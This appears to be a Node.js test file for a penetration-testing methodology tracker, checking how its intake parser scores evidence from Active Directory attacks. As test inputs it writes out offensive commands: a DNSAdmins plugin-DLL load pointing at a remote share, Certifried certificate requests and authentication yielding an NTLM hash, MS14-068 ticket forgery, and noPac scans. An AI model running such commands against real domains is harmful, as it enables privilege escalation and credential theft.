'use strict';
const assert=require('assert'),fs=require('fs'),vm=require('vm'),path=require('path'),cp=require('child_process');global.window=globalThis;global.DOMParser=function(){};
function run(file){vm.runInThisContext(fs.readFileSync(file,'utf8'),{filename:file});}const root=path.join(__dirname,'..');
for(const f of ['lanes.js','methodology-v2.2.js','methodology-v2.3.js','methodology-v2.5.js','tools-v2.2.js','methodology-v3.3.js','methodology-v3.4.js','methodology-v3.6.js','methodology-v4.1.js','orange-ad-2025.03.js','methodology-v4.3.js','methodology-v4.4.js','methodology-v4.5.js','methodology-v4.6.js','methodology-v4.7.js','methodology-v4.8.js','dashboard-v4.9.js','dashboard-v5.0.js','dashboard-v5.1.js','dashboard-v5.2.js','methodology-v5.3.js','dashboard-v5.3.js','methodology-v5.4.js','dashboard-v5.4.js','methodology-v5.5.js','dashboard-v5.5.js','methodology-v5.6.js','dashboard-v5.6.js','methodology-v5.7.js','dashboard-v5.7.js'])run(path.join(root,'data',f));
for(const f of ['core-v2-base.js','core-v2.js','core-v2.1.js','core-v2.2.js','core-v2.3.js','core-v2.4.js','core-v2.5.js','core-v2.6.js','core-v2.7.js','core-v2.8.js','core-v2.9.js','core-v3.0.js','core-v3.1.js','core-v3.2.js','core-v3.3.js','core-v3.4.js','core-v3.5.js','core-v3.6.js','core-v3.7.js','core-v3.8.js','core-v3.9.js','core-v4.0.js','core-v4.1.js','core-v4.2.js','core-v4.3.js','core-v4.4.js','core-v4.5.js','core-v4.6.js','core-v4.7.js','core-v4.8.js','core-v4.9.js','core-v5.0.js','core-v5.1.js','core-v5.2.js','core-v5.3.js','core-v5.4.js','core-v5.5.js','core-v5.6.js','core-v5.7.js'])run(path.join(root,'assets',f));
run(path.join(root,'assets','intake-v2.1.js'));run(path.join(root,'assets','intake-v5.3.js'));run(path.join(root,'assets','intake-v5.4.js'));run(path.join(root,'assets','intake-v5.5.js'));run(path.join(root,'assets','intake-v5.6.js'));run(path.join(root,'assets','intake-v5.7.js'));
const C=global.OBOL_CORE_V2,O=global.OBOL_ORANGE_AD_2025_03,M=global.OBOL_METHODOLOGY_V57,I=global.OBOL_INTAKE_V57,lanes=global.OBOL_LANES;let passed=0;function test(n,f){try{f();console.log('ok - '+n);passed++;}catch(e){console.error('FAIL - '+n);throw e;}}
function card(id){for(const l of lanes)for(const c of l.cards||[])if(c.id===id)return c;return null;}
test('v5.7 initializes current release state',()=>{const s=C.newState();assert.strictEqual(C.VERSION,'5.7.0');assert.strictEqual(s.obolVersion,'5.7.0');assert.strictEqual(s.ui.dashboard57.showGapWave,true);});
test('v5.7 closes five canonical gaps without denominator drift',()=>{assert.strictEqual(O.upstream.commit,'6d16ca0d1434875e0617f2f3cfa825fad0bc7d7e');const c=C.mindmapCoverage42(lanes);assert.deepStrictEqual([c.implemented,c.partial,c.gap,c.stale,c.coveragePct,c.representedPct],[72,34,21,0,57,83]);assert.strictEqual(M.advancedKeys.length,5);});
test('v5.7 leaves only canonical-gap Build Next work',()=>{const q=C.buildNext52(lanes);assert.deepStrictEqual([q.implementedQuality,q.mappedDelivery,q.canonicalGaps,q.total],[0,0,21,21]);});
test('all five v5.7 canonical owners are delivery-ready',()=>{const ready=C.deliveryReadiness52(lanes);for(const key of M.advancedKeys){const row=ready.rows.find(x=>x.key===key);assert(row&&row.status==='implemented'&&row.ready,key);}for(const id of M.cardIds){const c=card(id);assert(c&&c.evidence45&&c.evidence45.source==='v5.7',id);assert((c.commands||[]).every(x=>!!x.operatorSurface40),id);assert(c.report47&&c.report47.traceable,id);}});
test('DNSAdmins proof stops at configuration state',()=>{let p=I.proof57('dnsadmin-abuse57','dnscmd.exe DC01 /config /serverlevelplugindll \\\\10.0.0.5\\share\\plugin.dll','Command completed successfully.');assert(p.success&&p.facts.includes('ad.dnsadmin_plugin_configured'));assert(!p.facts.includes('access.system')&&!p.facts.includes('access.admin'));p=I.proof57('dnsadmin-abuse57','sc.exe \\\\DC01 stop dns','SERVICE_STOP_PENDING');assert(!p.success);});
test('Entra Connect discovery creates only hybrid identity context',()=>{const p=I.proof57('entra-connect-discovery57','nxc ldap 10.0.0.10 -u user -p pass -M get-desc-users','MSOL_8f31a2  Account created by Microsoft Azure Active Directory Connect');assert(p.success&&p.facts.includes('ad.entra_connect_discovered'));assert(!p.facts.includes('credential.plaintext')&&!p.facts.includes('access.admin'));});
test('Certifried certificate and authentication proof remain separate from privilege',()=>{let p=I.proof57('certifried57','certipy req -u OBOLCERT$@corp.local -p pass -target ca -ca CORP-CA -template Machine','Saved certificate and private key to obolcert.pfx');assert(p.success&&p.facts.includes('credential.certificate')&&!p.facts.includes('access.admin'));p=I.proof57('certifried57','certipy auth -pfx obolcert.pfx -username DC01$ -domain corp.local -dc-ip 10.0.0.10','Got hash for DC01$: aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef');assert(p.success&&p.facts.includes('credential.ntlm_hash')&&!p.facts.includes('access.admin'));});
test('MS14-068 age context is inconclusive while saved ticket is proof',()=>{let p=I.proof57('ms14-06857','python3 findSMB2UPTime.py 10.0.0.10','Windows Server 2008 R2 uptime 90 days');assert(!p.success);p=I.proof57('ms14-06857','python3 ms14-068.py -u user@corp.local -p pass -s S-1-5-21-1 -d dc01.corp.local','Saving ticket in TGT_user.ccache');assert(p.success&&p.facts.includes('kerberos.tickets')&&!p.facts.includes('access.admin'));});
test('noPac preserves positive and negative detection semantics',()=>{let p=I.proof57('nopac57','nxc smb 10.0.0.10 -u user -p pass -M nopac','NOT VULNERABLE');assert(p.success&&!p.facts.includes('vuln.nopac'));p=I.proof57('nopac57','nxc smb 10.0.0.10 -u user -p pass -M nopac','VULNERABLE');assert(p.success&&p.facts.includes('vuln.nopac'));});
test('dashboard exposes v5.7 gap reduction and historical v5.6 milestone',()=>{const d=C.northStarDashboard57(C.newState(),lanes);assert.strictEqual(d.canonicalAdvance57.delta,5);assert.strictEqual(d.canonicalAdvance57.toImplemented,72);assert.strictEqual(d.gapWave57.remainingGaps,21);assert(d.milestones.some(x=>x.release==='v5.7'&&x.implemented===72));assert(d.milestones.some(x=>x.release==='v5.6'&&x.implemented===67));});
test('README generator remains live and future-safe',()=>{const out=cp.execFileSync(process.execPath,[path.join(root,'tools','sync-readme-build-next.js'),'--print'],{encoding:'utf8'});assert(out.includes('OBOL-BUILD-NEXT:START'));assert(/Canonical methodology:\*\* \d+\/127 fully implemented \(\d+%\)/.test(out));assert(out.includes('North Star Dashboard → Build Next'));});
test('v5.7 release wiring remains present after later releases',()=>{const idx=fs.readFileSync(path.join(root,'index.html'),'utf8'),readme=fs.readFileSync(path.join(root,'README.md'),'utf8'),changelog=fs.readFileSync(path.join(root,'CHANGELOG.md'),'utf8'),preflight=fs.readFileSync(path.join(root,'tools','release-preflight.js'),'utf8'),north=fs.readFileSync(path.join(root,'docs','NORTH-STAR.md'),'utf8');for(const x of ['methodology-v5.7.js','dashboard-v5.7.js','core-v5.7.js','intake-v5.7.js','app-v5.7.js','obol-v5.7.css'])assert(idx.includes(x),x);assert(/Current release: \*\*v\d+\.\d+(?:\.\d+)?\*\*/.test(readme));assert(readme.includes('<!-- OBOL-PRODUCT-BUILD-NEXT:START -->'));assert(readme.includes('Product Build Next'));assert(north.includes('Build Next ordering'));assert(changelog.includes('## v5.7'));assert(preflight.includes('sync-readme-build-next.js'));});
test('sanitized export advances to v5.7 while retaining secret redaction',()=>{const s=C.newState();C.addTypedArtifact(s,'secrets','DoNotExport!',{});const safe=C.sanitizedCopy(s);assert.strictEqual(safe.obolVersion,'5.7.0');assert.strictEqual(safe.typedArtifacts.secrets[0].value,'[REDACTED SECRET]');});
console.log(`\n${passed} v5.7 tests passed`);
